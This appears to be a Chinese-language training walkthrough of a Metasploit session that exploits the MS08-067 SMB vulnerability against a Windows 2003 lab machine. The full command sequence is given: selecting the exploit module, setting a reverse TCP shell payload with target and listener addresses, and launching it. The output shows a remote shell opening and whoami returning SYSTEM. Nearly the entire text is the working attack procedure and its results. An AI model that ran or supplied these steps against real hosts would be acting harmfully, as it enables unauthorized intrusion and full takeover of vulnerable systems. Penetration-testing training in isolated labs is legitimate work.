MSF魔鬼训练营-5.3 MS08-067安全漏洞实战

msf > search ms08_067

Matching Modules

================

   Name                                 Disclosure Date  Rank   Description

   ----                                 ---------------  ----   -----------

   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                     yes       The target address

   RPORT    445              yes       The SMB service port (TCP)

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name

   --  ----

   0   Automatic Targeting

msf exploit(ms08_067_netapi) > show payloads    查看payload

Compatible Payloads

===================

   Name                                                Disclosure Date  Rank    Description

   ----                                                ---------------  ----    -----------

   generic/custom                                                       normal  Custom Payload

   generic/debug_trap                                                   normal  Generic x86 Debug Trap

   generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline

   generic/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline

   generic/tight_loop                                                   normal  Generic x86 Tight Loop

........

 

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp

payload => generic/shell_reverse_tcp

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                     yes       The target address

   RPORT    445              yes       The SMB service port (TCP)

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description

   ----   ---------------  --------  -----------

   LHOST                   yes       The listen address

   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Automatic Targeting

 

msf exploit(ms08_067_netapi) > show targets     查看可以攻击的目标，0为自动判断

Exploit targets:

   Id  Name

   --  ----

   0   Automatic Targeting

   1   Windows 2000 Universal

   2   Windows XP SP0/SP1 Universal

   3   Windows 2003 SP0 Universal

   4   Windows XP SP2 English (AlwaysOn NX)

   5   Windows XP SP2 English (NX)

   6   Windows XP SP3 English (AlwaysOn NX)

   7   Windows XP SP3 English (NX)

   8   Windows XP SP2 Arabic (NX)

   9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)

   10  Windows XP SP2 Chinese - Simplified (NX)

   11  Windows XP SP2 Chinese - Traditional (NX)

   12  Windows XP SP2 Czech (NX)

   13  Windows XP SP2 Danish (NX)

   14  Windows XP SP2 German (NX)

   15  Windows XP SP2 Greek (NX)

   16  Windows XP SP2 Spanish (NX)

   17  Windows XP SP2 Finnish (NX)

   18  Windows XP SP2 French (NX)

   19  Windows XP SP2 Hebrew (NX)

   20  Windows XP SP2 Hungarian (NX)

   21  Windows XP SP2 Italian (NX)

   22  Windows XP SP2 Japanese (NX)

   23  Windows XP SP2 Korean (NX)

   24  Windows XP SP2 Dutch (NX)

   25  Windows XP SP2 Norwegian (NX)

   26  Windows XP SP2 Polish (NX)

   27  Windows XP SP2 Portuguese - Brazilian (NX)

   28  Windows XP SP2 Portuguese (NX)

   29  Windows XP SP2 Russian (NX)

   30  Windows XP SP2 Swedish (NX)

   31  Windows XP SP2 Turkish (NX)

   32  Windows XP SP3 Arabic (NX)

   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)

   34  Windows XP SP3 Chinese - Simplified (NX)

   35  Windows XP SP3 Chinese - Traditional (NX)

   36  Windows XP SP3 Czech (NX)

   37  Windows XP SP3 Danish (NX)

   38  Windows XP SP3 German (NX)

   39  Windows XP SP3 Greek (NX)

   40  Windows XP SP3 Spanish (NX)

   41  Windows XP SP3 Finnish (NX)

   42  Windows XP SP3 French (NX)

   43  Windows XP SP3 Hebrew (NX)

   44  Windows XP SP3 Hungarian (NX)

   45  Windows XP SP3 Italian (NX)

   46  Windows XP SP3 Japanese (NX)

   47  Windows XP SP3 Korean (NX)

   48  Windows XP SP3 Dutch (NX)

   49  Windows XP SP3 Norwegian (NX)

   50  Windows XP SP3 Polish (NX)

   51  Windows XP SP3 Portuguese - Brazilian (NX)

   52  Windows XP SP3 Portuguese (NX)

   53  Windows XP SP3 Russian (NX)

   54  Windows XP SP3 Swedish (NX)

   55  Windows XP SP3 Turkish (NX)

   56  Windows 2003 SP1 English (NO NX)

   57  Windows 2003 SP1 English (NX)

   58  Windows 2003 SP1 Japanese (NO NX)

   59  Windows 2003 SP1 Spanish (NO NX)

   60  Windows 2003 SP1 Spanish (NX)

   61  Windows 2003 SP1 French (NO NX)

   62  Windows 2003 SP1 French (NX)

   63  Windows 2003 SP2 English (NO NX)

   64  Windows 2003 SP2 English (NX)

   65  Windows 2003 SP2 German (NO NX)

   66  Windows 2003 SP2 German (NX)

   67  Windows 2003 SP2 Portuguese - Brazilian (NX)

   68  Windows 2003 SP2 Spanish (NO NX)

   69  Windows 2003 SP2 Spanish (NX)

   70  Windows 2003 SP2 Japanese (NO NX)

   71  Windows 2003 SP2 French (NO NX)

   72  Windows 2003 SP2 French (NX)

msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130    设置远端IP地址

RhOST => 10.10.10.130

msf exploit(ms08_067_netapi) > set LPORT 5000    设置本地端口

LPORT => 5000

msf exploit(ms08_067_netapi) > set LHOST 10.10.10.131    设置本地IP地址

LHOST => 10.10.10.131

msf exploit(ms08_067_netapi) > set target 3    设置目标系统编号

target => 3

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    10.10.10.130     yes       The target address

   RPORT    445              yes       The SMB service port (TCP)

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description

   ----   ---------------  --------  -----------

   LHOST  10.10.10.131     yes       The listen address

   LPORT  5000             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   3   Windows 2003 SP0 Universal

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.10.131:5000

[*] 10.10.10.130:445 - Attempting to trigger the vulnerability...

[*] Command shell session 1 opened (10.10.10.131:5000 -> 10.10.10.130:2799) at 2017-10-23 10:14:24 +0800

Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.

 

C:WINDOWSsystem32>ipconfig/all    

ipconfig/all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : root-tvi862ubeh

   Primary Dns Suffix  . . . . . . . :

   Node Type . . . . . . . . . . . . : Unknown

   IP Routing Enabled. . . . . . . . : No

   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :

   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection

   Physical Address. . . . . . . . . : 00-0C-29-09-18-C6

   DHCP Enabled. . . . . . . . . . . : No

   IP Address. . . . . . . . . . . . : 10.10.10.130

   Subnet Mask . . . . . . . . . . . : 255.255.255.0

   Default Gateway . . . . . . . . . : 10.10.10.2

   DNS Servers . . . . . . . . . . . : 10.10.10.2

 

C:WINDOWSsystem32>whoami

whoami

nt authoritysystem